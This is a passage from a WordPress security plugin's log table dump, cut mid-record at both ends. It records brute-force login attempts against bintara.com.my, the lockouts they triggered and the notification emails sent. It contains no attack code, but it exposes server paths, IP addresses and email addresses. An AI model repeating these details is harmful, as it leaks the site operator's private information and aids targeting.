\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMnHkXpgmG5P@iB8kbSAAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.43.46\";s:11:\"REMOTE_PORT\";s:5:\"45366\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMnHkXpgmG5P@iB8kbSAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066141.0676\";s:12:\"REQUEST_TIME\";s:10:\"1569066141\";}}','notice','2019-09-21 11:42:22','2019-09-21 11:42:21',17794904,19285680,'https://bintara.com.my/wp/wp-login.php',1,0,'103.7.43.46'),(25713,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:42:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:42:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:57:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:57:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:42:22','2019-09-21 11:42:21',17879704,19285680,'https://bintara.com.my/wp/wp-login.php',1,0,'103.7.43.46'),(25714,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:42:22','2019-09-21 11:42:21',18085504,19285680,'https://bintara.com.my/wp/wp-login.php',1,0,'103.7.43.46'),(25715,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMn3kXpgmG5P@iB8kbTQAAAIU\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.43.46\";s:11:\"REMOTE_PORT\";s:5:\"45718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMn3kXpgmG5P@iB8kbTQAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066143.1252\";s:12:\"REQUEST_TIME\";s:10:\"1569066143\";}}','notice','2019-09-21 11:42:24','2019-09-21 11:42:23',18313768,19610752,'https://bintara.com.my/wp/xmlrpc.php',1,0,'103.7.43.46'),(25716,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMv3kXpgmG5P@iB8kbcwAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.52.111\";s:11:\"REMOTE_PORT\";s:5:\"48016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMv3kXpgmG5P@iB8kbcwAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066175.1844\";s:12:\"REQUEST_TIME\";s:10:\"1569066175\";}}','notice','2019-09-21 11:42:56','2019-09-21 11:42:55',17799272,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'150.95.52.111'),(25717,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:42:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:42:55\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:57:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:57:55\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:42:56','2019-09-21 11:42:55',17884264,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'150.95.52.111'),(25718,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:42:56','2019-09-21 11:42:55',18090584,19290104,'https://bintara.com.my/test/wp-login.php',1,0,'150.95.52.111'),(25719,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMwViJ7D9Gn7wDPh8ZYQAAANI\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.52.111\";s:11:\"REMOTE_PORT\";s:5:\"48472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMwViJ7D9Gn7wDPh8ZYQAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066177.2554\";s:12:\"REQUEST_TIME\";s:10:\"1569066177\";}}','notice','2019-09-21 11:42:58','2019-09-21 11:42:57',18313736,19612128,'https://bintara.com.my/test/xmlrpc.php',1,0,'150.95.52.111'),(25720,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMx3kXpgmG5P@iB8kbfwAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"54480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMx3kXpgmG5P@iB8kbfwAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066183.8053\";s:12:\"REQUEST_TIME\";s:10:\"1569066183\";}}','notice','2019-09-21 11:43:05','2019-09-21 11:43:04',17799272,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25721,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:43:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:43:04\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:58:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:58:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:43:05','2019-09-21 11:43:04',17884264,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25722,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:43:05','2019-09-21 11:43:04',18090584,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'103.81.84.140'),(25723,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMyliJ7D9Gn7wDPh8ZZQAAAM8\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"55276\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMyliJ7D9Gn7wDPh8ZZQAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066186.2414\";s:12:\"REQUEST_TIME\";s:10:\"1569066186\";}}','notice','2019-09-21 11:43:07','2019-09-21 11:43:06',18313736,19612128,'https://bintara.com.my/blog/xmlrpc.php',1,0,'103.81.84.140'),(25724,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM1TDrcQxTmGrCWuaMNAAAAcM\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"66.70.160.187\";s:11:\"REMOTE_PORT\";s:5:\"36740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM1TDrcQxTmGrCWuaMNAAAAcM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066197.9401\";s:12:\"REQUEST_TIME\";s:10:\"1569066197\";}}','notice','2019-09-21 11:43:20','2019-09-21 11:43:18',17797136,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'66.70.160.187'),(25725,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 